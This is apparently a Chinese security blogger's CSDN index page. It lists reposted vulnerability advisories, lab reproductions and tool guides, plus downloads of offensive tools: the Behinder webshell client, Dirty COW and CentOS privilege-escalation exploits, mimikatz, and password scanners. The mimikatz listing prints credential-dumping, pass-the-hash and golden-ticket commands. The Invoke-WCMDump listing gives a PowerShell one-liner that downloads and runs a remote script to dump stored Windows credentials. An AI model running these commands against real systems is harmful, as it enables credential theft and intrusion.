爱国小白帽_admin-root_CSDN博客-新增漏洞报告,渗透测试,数据库基础与注入领域博主

原创 DedecmsV5.7任意代码执行漏洞复现（靶场及工具已打包）

声明：本文介绍的技术仅供网络安全技术人员及白帽子使用，任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为，一经发现直接上报国家安全机关处理，著作权归爱国小白帽所有准备靶场及工具打包在公众号，回复“dede”领取，也可单独下载dedecmsV5.7靶机源码冰蝎3.0window版可公网访问的云端服务器（如果没有可用本地虚拟机模拟）phpstudyD盾（次要）FinalShell（次要）首先将靶机解压，进入install目录，将install_lock.txt文件删除，inde.

2020-12-29 13:41:03 234 2

原创网络安全相关行业必备网站（持续更新中）

更新时间：2020年10月22日11:37:29更新内容：更新了码农常用工具直达目录信息收集类搜索引擎指纹识别whois查询子域名爆破端口扫描综合查询身份信息泄露查询威胁情报C段查询：[webscan.cc](https://webscan.cc)加密解密类md5base64站长工具：[tool.chinaz.com](http://tool.chinaz.com/Tools/Unicode.aspx)零宽隐写：[yuanfux.github.io](https://yuanfux.github.i.

2020-10-14 16:16:13 3543 11

原创【专题文章导航】本篇收录了SQL注入、漏洞复现、后渗透、新增漏洞报告四个专题的所有文章

SQL注入篇漏洞复现篇新增漏洞报告mysql 联合查询注入文件上传之js绕过【威胁通告】Apache Tomcat 文件包含漏洞（CVE-2020-1938）威胁通告对information_schema数据库的解析文件上传之mime绕过【威胁通告】微软 SQL Server 远程代码执行漏洞（CVE-2020-0618）威胁通告盲注iis6.0解析漏洞...

2020-03-07 11:54:33 1014 2

转载 Jumpserver 任意命令执行漏洞分析报告

报告编号：B6-2021-011803报告来源：360CERT报告作者：360CERT更新日期：2021-01-190x01漏洞简述2021年01月18日，360CERT监测发现Jumpserver发布了远程命令执行漏洞的风险通告，漏洞等级：高危，漏洞评分：8.5。Jumpserver中存在一处受控服务器远程任意命令执行漏洞，该漏洞由多处漏洞导致。对此，360CERT建议广大用户好资产自查以及预防工作，以免遭受黑客攻击。本次漏洞出现的核心问题在于\1. log文件的默认路径固定，且易知.

2021-01-19 21:14:09 62

转载 Jumpserver受控服务器任意命令执行漏洞通告

报告编号：B6-2021-011802报告来源：360CERT报告作者：360CERT更新日期：2021-01-180x01漏洞简述2021年01月18日，360CERT监测发现Jumpserver发布了远程命令执行漏洞的风险通告，漏洞等级：高危，漏洞评分：8.5。Jumpserver中存在一处受控服务器远程任意命令执行漏洞，该漏洞由多处漏洞导致。对此，360CERT建议广大用户好资产自查以及预防工作，以免遭受黑客攻击。0x02风险等级360CERT对该漏洞的评定结果如下评定方.

2021-01-19 21:13:05 104

转载警惕冒充“疾管中心”、“市场监管”等进行的电信诈骗活动

文章转载自：安恒威胁情报中心背景2021年1月8日，国家反诈中心提醒：有不法分子借预约新冠疫苗接种发布虚假链接非法收集公民个人信息，案犯群发所谓“开放预约、名额有限”短信，引诱受害人点击木马网址链接，要求填写身份证号、手机号、银行卡号等，随后套取银行卡验证码，将账户内资金转走。我们通过安恒威胁情报中心平台以及安恒Sumap全球网络空间超级雷达进行关联分析，还发现了该事件相关的多个钓鱼网站。这些钓鱼网站使用了四种风格相似的网页模板，钓鱼模板伪装为“统一企业执照信息管理系统”、“国家企业执照信息.

2021-01-19 20:26:39 288

原创漏洞复现篇——利用vulhub模拟Weblogic的SSRF漏洞
原力计划

SSRF漏洞：SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF访问的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...

2021-01-15 18:59:33 874

转载 INCASEFORMAT蠕虫病毒网络传播风险通告

报告编号：B6-2021-011501报告来源：360CERT报告作者：360CERT更新日期：2021-01-150x01背景1月13日，360安全大脑检测到蠕虫病毒incaseformat大范围爆发，涉及政府、医疗、教育、运营商等多个行业，该病毒在感染用户机器后会通过U盘自我复制感染到其他电脑，最终导致电脑中非系统分区的磁盘文件被删除，给用户造成极大损失。由于被删除文件分区根目录下均存在名为incaseformat.log的空文件，因此网络上将此病毒命名为incaseformat。Inca.

2021-01-15 18:57:51 236

转载 Incaseformat 蠕虫病毒威胁通告

报告编号：B6-2021-011401报告来源：360CERT报告作者：360CERT更新日期：2021-01-140x01事件简述2021年01月13日，360安全卫士发布了Incaseformat蠕虫病毒的风险通告，事件等级：高危，事件评分：8.5。360第一时间发布了专杀工具与修复方案（见修复建议）对此，360CERT建议广大用户好资产自查以及预防工作，以免遭受黑客攻击。0x02风险等级360CERT对该事件的评定结果如下评定方式等级威胁等级高危影响面.

2021-01-14 09:28:43 881

转载 2021-01 补丁日: 微软多个高危漏洞通告

报告编号：B6-2021-011302报告来源：360CERT报告作者：360CERT更新日期：2021-01-130x01事件简述2021年01月13日，360CERT监测发现发布了的风险通告，事件等级：严重，事件评分：8.8。此次安全更新发布了83个漏洞的补丁，主要涵盖了以下组件: Windows操作系统、Edge浏览器、Office办公套件、Windows 编解码器库、Visual Studio、SQL Server、反病毒引擎、.NET、Azure 。其中包括10个严重漏洞，73个高危.

2021-01-14 09:28:04 166

转载【安全事件】沉睡多年的incaseformat蠕虫病毒今日被唤醒！

通告编号:NS-2021-00022021-01-13TAG：incaseformat、Worm.Win32.Autorun、数据删除、数据恢复病毒危害：*此病毒会删除所有非系统分区的文件。*版本：**1.0 **1事件背景2021年1月13日，绿盟科技应急响应团队接到全国多个客户反馈感染所谓的incaseformat病毒，涉及政府、医疗、教育、运营商等多个行业，且感染主机多为财务管理相关应用系统。感染主机表现为所有非系统分区文件均被删除，由于被删除文件分区根目录

2021-01-14 09:18:16 797

转载 CVE-2021-1647：Microsoft Defender远程代码执行漏洞通告

报告编号：B6-2021-011301报告来源：360CERT报告作者：360CERT更新日期：2021-01-130x01漏洞简述2021年01月13日，360CERT监测发现Microsoft发布了Microsoft Defender 缓冲区溢出漏洞的风险通告，该漏洞编号为CVE-2021-1647，漏洞等级：高危，漏洞评分：7.8。攻击者通过构造特殊的PE文件,可造成Microsoft Defender 远程代码执行。该漏洞目前有在野利用对此，360CERT建议广大用户及时将Micr.

2021-01-14 09:16:50 770

转载 Chrome 多个高危漏洞通告

报告编号：B6-2021-011201报告来源：360CERT报告作者：360CERT更新日期：2021-01-120x01事件简述2021年01月12日，360CERT监测发现Google发布了Chrome安全更新的风险通告，事件等级：严重，事件评分：9.6。Goolge针对Chrome发布了新版本更新，新版中修复了16处安全漏洞，包含12个高危漏洞。其中CVE-2020-21107/21108/21109/21115四处高危漏洞由 360Alpha Lab 第一时间向Google报告并协.

2021-01-14 09:15:44 36

转载致远OA 文件上传漏洞

报告编号：B6-2021-010801报告来源：360CERT报告作者：360CERT更新日期：2021-01-080x01漏洞简述2021年01月08日，360CERT监测发现致远OA发布了致远OA的风险通告，漏洞等级：严重，漏洞评分：9.8。致远OA旧版本某些接口存在未授权访问，攻击者能够上传恶意脚本文件，从而控制服务器。对此，360CERT建议广大用户好资产自查以及预防工作，以免遭受黑客攻击。0x02风险等级360CERT对该漏洞的评定结果如下评定方式等级威胁.

2021-01-11 13:15:50 715

转载 FortiWeb 多个高危漏洞安全通告

报告编号：B6-2021-010701报告来源：360CERT报告作者：360CERT更新日期：2021-01-070x01事件简述2021年01月07日，360CERT监测发现FortiWeb发布了FortiWeb 多个高危漏洞的风险通告，漏洞编号有CVE-2020-29015,CVE-2020-29016,CVE-2020-29019,CVE-2020-29018，事件等级：严重，事件评分：9.8。FortiGate防火墙 FortiWeb应用中存在多处漏洞：SQL注入漏洞，栈溢出漏洞，信.

2021-01-11 13:14:27 166

原创我的网安之路——2020年总结（从零基础到大神，我经历了什么？）

前言：转眼投入这行也算一年了，从20多年没碰过电脑的小白白，到坐拥上千粉丝的博主，我用了三个月。现在一年过去了，粉丝到了3k+，虽然不多，但是很铁，因为我的文章收藏量总是很多精彩人生从此刻开始初相识艰辛路感恩感谢写作的经验有惊喜有失落你关注公众号没相遇即是缘，点赞加留言初自我介绍网络昵称：admin-root博客地址：admin-root.blog.csdn.net性别：男年龄：24学历：大专公众号：爱国小白帽爱好：打各种球、下各.

2021-01-09 15:32:25 3150 24

转载 CVE-2020-17518/17519：Apache Flink 目录遍历漏洞

报告编号：B6-2021-010601报告来源：360CERT报告作者：360CERT更新日期：2021-01-060x01漏洞简述2021年01月06日，360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞,目录穿越漏洞的风险通告，漏洞编号为CVE-2020-17518,CVE-2020-17519，漏洞等级：高危，漏洞评分：8.5。远程攻击者通过REST API目录遍历，可造成文件读取/写入的影响。对此，360CERT建议广大用户及时将Apache .

2021-01-06 13:39:31 780

原创 CentOS、Kali等Linux系统安装docker

安装命令yum -y install docker查看版本信息docker --version

2021-01-06 11:09:33 113

原创【CSDN超实用的浏览器插件】——去广告、快捷搜索、自定义工具等诸多功能等你探索

下载安装：先上一个下载链接https://t.csdnimg.cn/1YBE官方提供了三种下载方式插件也很小，才不到2M找到浏览器的管理扩展程序，选择开发者模式然后把文件拖进去即可成功后会弹窗，点击添加扩展程序然后自动跳到这个界面，以后每次点击加号都会进入这样的页面基本使用：外观可能你们已经注意到了这里图标和字都是半透明的，看不清楚，可以点击右上角进入开发助手然后点击设置更改把透明度拉到百分之百就好了（话说这里是不是弄反了？？不应该是0%嘛）点击下面的小图标会有很多高

2021-01-02 10:08:47 65

转载 CVE-2020-10148: SolarWinds 远程代码执行漏洞通告

报告编号：B6-2020-122802报告来源：360CERT报告作者：360CERT更新日期：2020-12-280x01 漏洞简述2020年12月28日，360CERT监测发现 SolarWinds 发布了 SolarWinds 代码执行漏洞的风险通告，该漏洞编号为 CVE-2020-10148 ，漏洞等级：严重，漏洞评分：9.8 。SolarWinds公开了供应链攻击之外的一处漏洞。该漏洞允许未授权的攻击者在受影响的SolarWinds系统上执行任意代码。对此，360CERT建议广.

2020-12-29 14:38:21 565

原创【CSDN超实用的浏览器插件】——去广告、快捷搜索、自定义工具等诸多功能等你探索

有了这个插件干啥都事半功倍

2020-12-22 19:24:52 3175 18

转载 CVE-2020-26258 / 26259：XStream反序列化漏洞公告

报告编号：B6-2020-121401报告来源：360CERT报告作者：360CERT更新日期：2020-12-140x01漏洞简述2020年12月14日，360CERT监测发现 XStream 发布了 XStream 反序列化漏洞的风险提示，突破编号为 CVE-2020-26259,CVE-2020-26258 ，突破等级：高危，裂缝评分：8.9。在运行 XSteam 的服务上，未授权的远程攻击者通过构造特定的序列化数据，可造成任意文件删除/ 服务端请求伪造。目前该突.

2020-12-17 09:29:05 236

转载 SolarWinds 供应链攻击通告

报告编号：B6-2020-121403报告来源：360CERT报告作者：360CERT更新日期：2020-12-140x01 漏洞简述2020年12月14日，360CERT监测发现 FireEye 发布了 SolarWinds 供应链攻击通告的分析报告，事件等级：严重，事件评分：10 。SolarWInds的产品中存在长达1年的供应链攻击，其产品中被植入多个后门。后门程序于2020年3月已经被SolarWInds官方应用程序引入，使用SolarWinds的用户需要立即安装更新修复对.

2020-12-17 09:26:34 449

转载 AMNESIA:33 多个TCP/IP开源代码库漏洞通告

报告编号：B6-2020-121501报告来源：360CERT报告作者：360CERT更新日期：2020-12-150x01 事件简述2020年12月15日，360CERT监测发现 Forescout 发布了 AMNESIA:33 的研究报告，事件等级：严重，事件评分：9.8 。AMNESIA:33 是指存在于 4 个开源的TCP/IP开发组件库中的 33 个漏洞。影响 uIP / FNET / picoTCP / Ethernut(Nut/Net) 。根据 Forescout.

2020-12-17 09:25:14 165

转载 CVE-2020-29436：Nexus Repository Manager 3 XML外部实体注入漏洞通告

报告编号：B6-2020-121601报告来源：360CERT报告作者：360CERT更新日期：2020-12-160x01 漏洞简述2020年12月16日，360CERT监测发现Nexus Repository Manager 3发布了Nexus Repository Manager 3 命令注入漏洞的风险通告，该漏洞编号为 CVE-2020-29436 ，漏洞等级：高危，漏洞评分：8.7 。拥有管理员权限的远程攻击者通过构造特定的XML请求 ,可造成 XML外部实体注入。对此，.

2020-12-17 09:23:36 159

转载 CVE-2020-1971: OpenSSL 拒绝服务漏洞通告

2020-12-09 08:47报告编号：B6-2020-120901报告来源：360CERT报告作者：360CERT更新日期：2020-12-090x01 漏洞简述2020年12月09日，360CERT监测发现 openssl 发布了 openssl 拒绝服务漏洞的风险通告，该漏洞编号为 CVE-2020-1971 ，漏洞等级：高危，漏洞评分： 7.5 。OpenSSL 在处理 EDIPartyName （X.509 GeneralName类型标识）的时候存在一处空指针解引用，并引起

2020-12-09 09:51:36 1896

转载 2020-12 补丁日: 微软多个高危漏洞通告

报告编号：B6-2020-120902报告来源：360CERT报告作者：360CERT更新日期：2020-12-090x01 漏洞简述2020年12月09日，360CERT监测发现微软官方发布了 12月安全更新的风险通告，事件等级：严重，事件评分：9.8 。此次安全更新发布了 58 个漏洞的补丁，主要涵盖了以下组件: Windows操作系统、IE/Edge浏览器、ChakraCore、Office办公套件、Exchange Server、Azure、微软动态、Visual Studi.

2020-12-09 09:50:10 421

原创渗透测试平台【Hack The Box】获取邀请码与注册讲解

Hack The Box官方网址：hackthebox.eu/：注册鏈接这里需要填写邀请码，想想会在哪里呢？第一步肯定是打开F12，查看网络，发现有inviteapi.min.jsinviteapi.min.js的全拼是邀请人的意思，答案会不会在这里呢？我们双击打开然后跳到了这样的页面，发现有makeInviteCode这样的函数百度翻译是生成邀请代码的意思，答案是这没...

2020-12-08 19:20:36 412 5

转载 CVE-2020-17530: Apache Struts2 远程代码执行漏洞通告

报告编号：B6-2020-120801报告来源：360CERT报告作者：360CERT更新日期：2020-12-080x01 漏洞简述2020年12月08日，360CERT监测发现 struts2 发布了 struts2 代码执行漏洞的风险通告，该漏洞编号为 CVE-2020-17530 ，漏洞等级：高危，漏洞评分：7.5 。在特定的环境下，远程攻击者通过构造恶意的OGNL表达式 ,可造成任意代码执行。对此，360CERT建议广大用户及时将 struts2 升级到最新版.

2020-12-08 16:11:59 5129

转载【首发】CVE-2020-15257 容器逃逸漏洞复现与解析附Poc

漏洞简介containerd是行业标准的容器运行时，可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中，容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0，但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器（有效UID为0，但特权降低）导致新进程以提升的特权运行。影响版本containerd < 1.4.3containerd < 1.3.9

2020-12-05 16:03:58 567 2

转载 CVE-2020-15257: containerd 虚拟环境逃逸漏洞通告

报告编号：B6-2020-120101报告来源：360CERT报告作者：360CERT更新日期：2020-12-010x01 漏洞简述2020年12月01日，360CERT监测发现 containerd 发布了 containerd 权限提升漏洞的风险通告，该漏洞编号为 CVE-2020-15257 ，漏洞等级：中危，漏洞评分：6.1 。containerd 修复了一处容器权限逃逸漏洞，该漏洞的本质是满足特定条件的容器可以绕过访问权限访问 containerd 的控制API 进而导.

2020-12-01 21:11:20 970

原创 gshark-敏感信息搜集防泄漏图形化工具（避坑指南）

介绍：此工具主要用于GitHub敏感信息泄露的监控，可实现邮件实时告警，非常强大所需环境：Python2、3皆可，笔者用的是Python3gsil项目：https://github.com/FeeiCN/GSIL开启POP3/SMTP服务的邮箱首先确定环境，没有环境变量的添加一下，别说你不会...

2020-12-01 10:47:08 263 1

原创 github敏感信息搜集工具gsil的配置及使用

介绍：此工具主要用于GitHub敏感信息泄露的监控，可实现邮件实时告警，缺点不是可视化所需环境：Python2、3皆可，笔者用的是Python3gsil项目：https://github.com/FeeiCN/GSIL开启POP3/SMTP服务的邮箱一个github账号token，获取地址：https://github.com/settings/tokens项目安装：建议在安装之前把pip升级到最新版，不然有可能报错，命令如下：python3 -m pip install --upg.

2020-11-29 23:43:24 1177 7

转载 CVE-2020-28948/28949: Drupal任意PHP代码执行漏洞通告

报告编号：B6-2020-112601报告来源：360CERT报告作者：360CERT更新日期：2020-11-260x01 漏洞简述2020年11月26日，360CERT监测发现 Drupal 发布了 Drupal 代码执行漏洞的风险通告，漏洞编号为 CVE-2020-28949/CVE-2020-28948 ，漏洞等级：高危，漏洞评分：7.2 。远程攻击者通过上传特殊构造的 .tar 、 .tar.gz 、 .bz2 、 .tlz 文件 ,可造成任意代码执行。对此，360.

2020-11-27 15:13:33 214

转载 VMWare 虚拟环境逃逸漏洞通告

报告编号：B6-2020-112501报告来源：360CERT报告作者：360CERT更新日期：2020-11-250x01 事件简述2020年11月25日，360CERT监测发现 VMWare 发布了 VMSA-2020-0026 的风险通告，漏洞编号为 CVE-2020-4004,CVE-2020-4005 ，事件等级：高危，事件评分：8.8 。VMWare发布缓冲区溢出、权限提升两处漏洞本地具有管理员权限的攻击者通过执行特制的二进制程序，可造成虚拟环境逃逸，并控制宿主主.

2020-11-25 17:21:49 250

转载 Cisco 多个严重漏洞通告

报告编号：B6-2020-111902报告来源：360CERT报告作者：360CERT更新日期：2020-11-190x01 事件简述2020年11月19日，360CERT监测发现 Cisco官方发布了多个严重漏洞的风险通告，漏洞编号为 CVE-2020-27130,CVE-2020-3531,CVE-2020-3586,CVE-2020-3470 ，事件等级：严重，事件评分：9.8 。本次通告中共计4处严重漏洞，攻击者可利用这些漏洞获得任意文件、执行任意命令、控制相关.

2020-11-19 12:48:02 242 1

转载 CVE-2020-13671: Drupal 远程代码执行漏洞通告

报告编号：B6-2020-111901报告来源：360CERT报告作者：360CERT更新日期：2020-11-190x01 漏洞简述2020年11月19日，360CERT监测发现 Drupal 发布了 Drupal 代码执行漏洞的风险通告，该漏洞编号为 CVE-2020-13671 ，漏洞等级：高危，漏洞评分：8.1 。未授权的远程攻击者通过上传特定文件名的文件 ,可造成任意代码执行。对此，360CERT建议广大用户及时将 Drupal 升级到最新版本。与此同时，请做.

2020-11-19 12:46:54 624 1

原创博客转载同步声明

声明：本人同意腾讯云社区同步所以原创博客，其他人转载请注明来源（腾讯云或CSDN）附url地址，谢谢。腾讯云博客地址：https://cloud.tencent.com/developer/user/7985623另，公众号文章也可转载，需要加白请留言（XX公众号申请加白）...

2020-11-18 16:42:31 112 2

转载 CVE-2020-3119 Cisco CDP 协议栈溢出漏洞分析

Cisco Discovery Protocol(CDP)协议是用来发现局域网中的Cisco设备的链路层协议。最近Cisco CDP协议爆了几个漏洞，挑了个栈溢出的CVE-2020-3119先来搞搞，Armis Labs也公开了他们的分析Paper。环境搭建虽然最近都在搞IoT相关的，但是还是第一次搞这种架构比较复杂的中型设备，大部分时间还是花在折腾环境上。3119这个CVE影响的是Cisco NX-OS类型的设备，去Cisco的安全中心找了下这个CVE，搜搜受影响的设备。发现受该漏洞影响的设备都挺

2020-11-16 17:06:24 86

转载 CVE-2020-26217: XStream 远程代码执行漏洞通告

原创360CERT[三六零CERT](javascript:void(0)????2020-11-16 12:09:18报告编号：B6-2020-111601报告来源：360CERT报告作者：360CERT更新日期：2020-11-160x01 漏洞简述2020年11月16日，360CERT监测发现 XStream 发布了 XStream 安全更新的风险通告，该漏洞编号为 CVE-2020-26217 ，漏洞等级：严重，漏洞评分：9.8 。XStream 发布安全更新修复了一处反

2020-11-16 14:01:56 1323

2020HW工具包.zip

原则文章蓝军HVV实用工具和网站总结（工具已打包）：https://admin-root.blog.csdn.net/article/details/108692522

2020-09-23

冰蝎window版Behinder_v3.0_Beta_6_win .zip

Behinder “冰蝎”动态二进制加密网站管理客户端功能介绍原文链接：《利用动态二进制加密实现新型一句话木马之客户端篇》 https://xz.aliyun.com/t/2799 工作原理原文链接：《利用动态二进制加密实现新型一句话木马之Java篇》 https://xz.aliyun.com/t/2744 《利用动态二进制加密实现新型一句话木马之.NET篇》 https://xz.aliyun.com/t/2758 《利用动态二进制加密实现新型一句话木马之PHP篇》 https://xz.aliyun.com/t/2774 运行环境客户端：jre8+ 服务端：.net

2020-12-25

upload-labs-master.zip

简介 upload-labs是一个使用php语言编写的，专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关，每一关都包含着不同上传方式。注意 1.每一关没有固定的通关方法，大家不要自限思维！ 2.本项目提供的writeup只是起一个参考作用，希望大家可以分享出自己的通关思路。 3.实在没有思路时，可以点击查看提示。 4.如果黑盒情况下，实在做不出，可以点击查看源码。

2020-02-13

dedecmsV5.7靶机源码.zip

DedeCMS应用领域 DedeCMS适合应用于以下领域： •企业网站，无论大型还是中小型企业，利用网络传递信息在一定程度上提高了办事的效率，提高企业的竞争力； •政府机关，通过建立政府门户，有利于各种信息和资源的整合，为政府和社会公众之间加强联系和沟通，从而使政府可以更快、更便捷、更有效开展工作； •教育机构，通过网络信息的引入，使得教育机构之间及教育机构内部和教育者之间进行信息传递，全面提升教育类网站的层面； •媒体机构，互联网这种新媒体已经强而有力的冲击了传统媒体，在这个演变过程中，各类媒体机构应对自己核心有一个重新认识和重新发展的过程，建立一个数字技术平台以适应数字化时代的需求； •行

2020-12-25

华军1433mssql数据库弱口令扫描工具

2020-03-25

PEiD0.95.zip

PE iDentifier v0.95 (2008.10.21) by snaker, Qwerton, Jibz & xineohP ------------------------------------------------------ PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 600 different signatures in PE files. PEiD is special in some aspects when compared to other identifiers already out there! 1. It has a superb GUI and the interface is really intuitive and simple. 2. Detection rates are amongst the best given by any other identifier. 3. Special scanning modes for *advanced* detections of modified and unknown files. 4. Shell integration, Command line support, Always on top and Drag'n'Drop capabilities. 5. Multiple file and directory scanning with recursion. 6. Task viewer and controller. 7. Plugin Interface with plugins like Generic OEP Finder and Krypto ANALyzer. 8. Extra scanning techniques used for even better detections. 9. Heuristic Scanning options. 10. New PE details, Imports, Exports and TLS viewers 11. New built in quick disassembler. 12. New built in hex viewer. 13. External signature interface which can be updated by the user. There are 3 different and unique scanning modes in PEiD. The *Normal Mode* scans the PE files at their Entry Point for all documented signatures. This is what all other identifiers also do. The *Deep Mode* scans the PE file's Entry Point containing section for all the documented signatures. This ensures detection of around 80% of modified and scrambled files. The *Hardcore Mode* does a complete scan of the entire PE file for the documented signatures. You should use this mode as a last option as the small signatures often tend to occur a lot in many files and so erroneous outputs may result. The scanner's inbuilt scanning techniques have error control methods which generally ensure correct outputs even if the last mode is chosen. The first two methods produce almost instantaneous outputs but the last method is a bit slow due to obvious reasons! Command line Options -------------------- PEiD now fully supports commandline parameters. peid -time // Show statistics before quitting peid -r // Recurse through subdirectories peid -nr // Don't scan subdirectories even if its set peid -hard // Scan files in Hardcore Mode peid -deep // Scan files in Deep Mode peid -norm // Scan files in Normal Mode peid <file1> <file2> <dir1> <dir2> You can combine one or more of the parameters. For example. peid -hard -time -r c:\windows\system32 peid -time -deep c:\windows\system32\*.dll Task Viewing / Control Module ----------------------------- You can scan currently running tasks with PEiD. The files are scanned from memory. Processes can also be terminated. You can also optionally dump a module and scan the dumped image. You can also view all dependant modules of the processes. Multiple File Scan Module ------------------------- You can scan multiple files at one go with PEiD. Just drag and drop the files on the PEiD main dialog and the Multiple File Scan Dialog will popup displaying the results. You can keep dragging and dropping files onto this dialog as well. It also offers you to choose from the different scanning modes and optionally load a single file in PEiD. It allows you to skip the non PE files so that the list looks clean. You can also scan the contents of a directory choosing files of custom extension if required. MFS v0.02 now supports recursive directory scanning. Disassembler Module ------------------- You can have a quick disassembly of the file loaded in PEiD. Double click to follow JMPs and CALLs and use the Back button to trace back to the original positions. You can copy disassembled output to the clipboard. A new CADT core with custom String Reference Finder has been cooked up. CADT is coded by Ms-Rem. Hex Viewer Module ------------------- You can have a quick hex view of the file loaded in PEiD. A modified version of 16Edit by y0da is used for this purpose. We intend to update the signatures quite often to keep pace with this ever evolving scene :) Please report bugs, ideas, new signatures or packer info to: pusher -> sir.pusher(at)gmail(dot)com ( Administration / Coder ) snaker -> snaker(at)myrealbox(dot)com Jibz -> peid(at)ibsensoftware(dot)com Qwerton -> qwaci(at)gmx(dot)net ALL SUGGESTIONS, IDEAS, BUG REPORTS AND CRITICS ARE WELCOME. History ------- 0.7 Beta -> First public release. 0.8 Public -> Added support for 40 more packers. OEP finding module. Task viewing/control module. GUI changes. General signature bug fixes. Multiple File and Directory Scanning module. 0.9 Recode -> Completely recoded from scratch. New Plugin Interface which lets you use extra features. Added more than 130 new signatures. Fixed many detections and general bugs. 0.91 Reborn -> Recoded everything again. New faster and better scanning engine. New internal signature system. MFS v0.02 now supports Recursive Scanning. Commandline Parser now updated and more powerful. Detections fi

2020-07-27

Advanced_IP_Scanner IP扫描工具

2020-04-03

mimikatz，ms14068

mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes). If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases Quick usage log privilege::debug sekurlsa sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd kerberos kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local Build mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: - for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =) Synchronize! - GIT URL is : https://github.com/gentilkiwi/mimikatz.git - SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk - ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip Build the solution - After opening the solution, Build / Build Solution (you can change architecture) - mimikatz is now built and ready to be used! (Win32 / x64) - you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: - http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme - http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Author - Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync function in lsadump module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) This is a personal development, please respect its philosophy and don't use it for bad things!

2020-04-02

Invoke-WCMDump结合powershell进行密码获取

Ivoke-WCMDump 什么是Credential Manager Credential Manager，中文翻译为凭据管理器，用来存储凭据(例如网站登录和主机远程连接的用户名密码)，如果用户选择存储凭据，那么当用户再次使用对应的操作，系统会自动填入凭据，实现自动登录，凭据保存在特定的位置，被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"

2020-03-26

dirtycow脏牛linux提权exp

2020-03-25

tunna实用工具

2020-03-25

hash密码抓取工具大全

hash密码抓取提取密码工具大全

2020-03-25

扫描工具大合集，包括代理、IP、端口、目录等扫描

2020-03-25

CentOS 5.5提权exp

2020-03-20

内网穿透工具Tunna-master.zip

